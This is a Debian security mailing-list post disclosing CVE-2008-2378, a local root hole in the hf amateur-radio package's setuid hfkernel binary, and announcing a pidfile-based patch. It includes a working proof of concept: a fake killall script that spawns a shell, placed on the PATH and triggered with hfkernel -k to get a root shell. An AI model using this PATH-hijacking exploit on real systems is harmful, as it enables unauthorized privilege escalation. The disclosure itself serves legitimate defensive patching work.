[Secure-testing-team] hf - CVE-2008-2378 - local root exploit

Steve Kemp skx at debian.org
Sat Nov 1 10:38:30 UTC 2008 

 The hf package, Described by Debian as an amateur-radio protocol suite
 using a soundcard as a modem, is a program that eventually becomes
 setuid(0), and has a trivial security hole in it.

 By default the package installs "/usr/bin/hfkernel" as a typical binary,
 but when first started via the program "hf" the binary is changed to
 be setuid(root).

 This is demonstrated:

skx at gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.


 If you do start the program as root the permissions are changed:

skx at gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...

  Now the program is setuid:

skx at gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel


  Unfortunately the hfkernel program contains a trivial root hole:

int main(int argc, char *argv[])
{
        // snip
        while ((c = getopt(argc, argv, "a:M:c:klhip:m:nt:s:r:Rf23")) != -1)
            switch (c) {

            // snip

                case 'k':
                    system ("killall hfkernel");

            //
}

  Creating ~/bin/killall is sufficient to gain root privileges.

skx at gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
skx at gold:~$ chmod 755 ~/bin/killall
skx at gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)


  This has been given the identifier CVE-2008-2378.

  Below is the patch that I've come up with to fix this hole, which
 is a simple pidfile approach.  Unless anybody has any comments
 I'll upload a fix for Etch on Monday/Tuesday.

Steve
--

-------------- next part --------------
A non-text attachment was scrubbed...
Name: hf.diff
Type: text/x-diff
Size: 4000 bytes
Desc: not available
Url : http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20081101/acf2697f/attachment.diff

More information about the Secure-testing-team mailing list